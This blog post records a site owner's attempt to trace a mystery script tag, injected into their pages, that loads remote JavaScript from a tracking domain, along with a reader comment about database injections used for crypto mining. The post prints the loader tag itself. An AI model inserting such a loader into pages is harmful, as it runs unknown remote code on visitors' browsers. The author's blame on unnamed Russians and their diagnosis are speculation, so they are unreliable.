2/24/2018

What is this code from positiverefreshment -- spyware / tracker?

Mystery Code Inserted Into Document Header -- PositiveRefreshment.org

I have been updating our website so that it will comply with full conversion of https:// and SSL requirements that are pending with Google's upcoming Chrome release. I think it's silly to force sites to use expensive SSL certificates that have no need for privacy of traffic, but what are ya gonna do at this point? The market winds have shifted.

And in the process, I have discovered that you can view the security of a page by right-clicking on it, and hitting "Inspect" from the menu. There is a "Security" tab. You probably will have to refresh the page to get the Inspector to show the secure and insecure elements.

Well, there is this mystery code that's been popping up on our site that looks like this:

<head>
<script type="text/javascript" src="https://www.MySiteName.com/wp-includes/js/jquery/jquery.js?ver=1.12.4"></script>

<script type="text/javascript" src="http://track.positiverefreshment.org/s_code.js?cid=220&v=24eca7c911f5e102e2ba"></script>

</head>
 The http:// is what's keeping our site from validating as secure.

I went searching for information about this tracking site, and there is hardly anything listed on Google about it, and nothing on Bing. There are less than 10 sites that mention "positiverefreshment" at all.

So, I tried to sort through all of the code in WordPress and the Theme we use, and nothing seemed to reference this "positiverefreshment" site.

I thought it might be coming from AdSense or some other third party plug-in -- nothing. 


I searched our Ubuntu server for any reference -- nothing.

I went back to the browser and noticed that this line is not in the HTML code. It only shows up in the Elements when you use the Inspect option.

It is being spontaneously inserted!

Okay, hmmm. That's really weird.

So, I duplicated one of the pages from WordPress, and chunk by chunk removed elements until I had isolated the culprit. What you see above is the minimum amount of code I had on the page (that would still invoke the mysterious insertion) -- just the JQuery source reference. That's it, nothing else.


So, I downloaded that version of JQuery and replaced it in WordPress with new code. Problem is still there.

If I remove the JQuery, the positiverefreshment reference disappears. SO VERY WEIRD.

I saved it as a .php and a .html page to see if it is being inserted on the server level somehow -- nope, no difference.

Hmmm.

I switched browsers -- to Firefox. And darnit! There it is again.

I switched computers. And it's not there. Not in any of the browsers.

Tried a Mac. Nope, it's not there.

I switched back to the original computer and opened it in MS Edge and Opera. The code is not there in the elements.


So, Chrome and Firefox are both Mozilla and it only shows up in those browsers.

I think I have an interloper -- spyware or a virus.

I edited the HOSTS file and added a line to block any outgoing reference to "track.positiverefreshement.org."


I turned the computer off and switched it with a drive I had been using a month ago. The code is not there -- not in any of the browsers.

So, it must be a fairly recent infection of the Mozilla browsers. Hmmm. Must have gone to some site that I should not have.

I run a MalwareBytes scan and it's still there.

I download Avast and run a full scan. It's still there.


I can't get rid of it. OK, I give up.

And suddenly, as I write this.... It's gone. It's not showing up.

Seriously, it was there a couple of hours ago, still saying our pages were not secure.

And now it's not showing up. The pages are green-locked secure.


Hmmm. This is getting to be very strange indeed. I think I will collect all of my emails and other files from the last month and go back to the old drive; and wipe this new drive. Something is not right here.

To the spyware thieves -- probably Russians, I say: "
прощай сука."

1 comment :

  1. its stored in your databases,atleast on my drupal blog ...your computer is fine..try to find string containing "text/javascript" or similar to that within your post...my experience is not only they redirect blog traffic to malware install site, they also using the site as crypto mining

    ReplyDelete